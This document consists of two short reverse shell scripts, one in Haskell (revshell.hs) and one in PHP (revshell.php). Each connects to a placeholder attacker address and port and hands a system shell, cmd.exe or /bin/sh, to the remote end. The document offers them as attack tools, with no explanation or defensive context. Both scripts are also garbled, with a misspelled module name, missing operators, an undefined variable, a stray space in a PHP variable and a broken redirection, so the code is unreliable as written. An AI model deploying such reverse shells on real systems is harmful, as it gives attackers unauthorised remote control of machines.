File: revshell.hs
import Network.Socket

import System.I0

import System.Process

main = do

let ip= "attacker_ip"

let port =attacker_port

sock <- socket AF_INET Stream 0

addr <- inet_addr ip

connect sock (SockAddrInet port addr) h socketToHandle sock ReadWriteMode

hSetBuffering h NoBuffering

let shell if os == "mingw32" then "cmd.exe" else "/bin/sh"

ph <- runProcess shell () Nothing Nothing (Just h) (Just h) (Just h)

waitForProcess ph

return ()

File: revshell.php
<?php

$ip = "attacker_ip";

$port = attacker_port;

$sock = fsockopen($ip, $port);

$ cmd = (strtoupper (substr(PHP_OS, 0, 3)) === 'WIN')? 'cmd.exe': '/bin/sh';

exec("$cmd -i <&3 &3 2>&3");

?>